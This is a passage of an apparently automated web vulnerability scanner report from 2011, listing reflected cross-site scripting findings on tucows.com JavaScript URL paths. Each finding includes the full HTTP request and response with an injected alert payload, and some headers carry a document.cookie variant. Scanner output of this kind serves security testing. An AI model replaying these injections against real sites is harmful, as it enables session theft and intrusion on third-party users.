Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js7e58a"-alert(1)-"92953272be5/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.359. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee858"-alert(1)-"2b00b808463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.jsee858"-alert(1)-"2b00b808463 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/signupin.jsee858"-alert(1)-"2b00b808463";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.360. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65747"-alert(1)-"fdf529e6e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.361. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d3d"-alert(1)-"9fd657fe3af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.362. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b794b"-alert(1)-"c38b7601809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jsb794b"-alert(1)-"c38b7601809 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/x_core.jsb794b"-alert(1)-"c38b7601809";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.363. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80391"-alert(1)-"2da181f97ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.364. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e49a"-alert(1)-"bcc9c43802 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.365. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d536b"-alert(1)-"a064303b2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.366. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beba4"-alert(1)-"b69b27dceac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.367. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ff"-alert(1)-"ccf5c4f6b2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.368. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd99a"-alert(1)-"3c47dc9c7d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
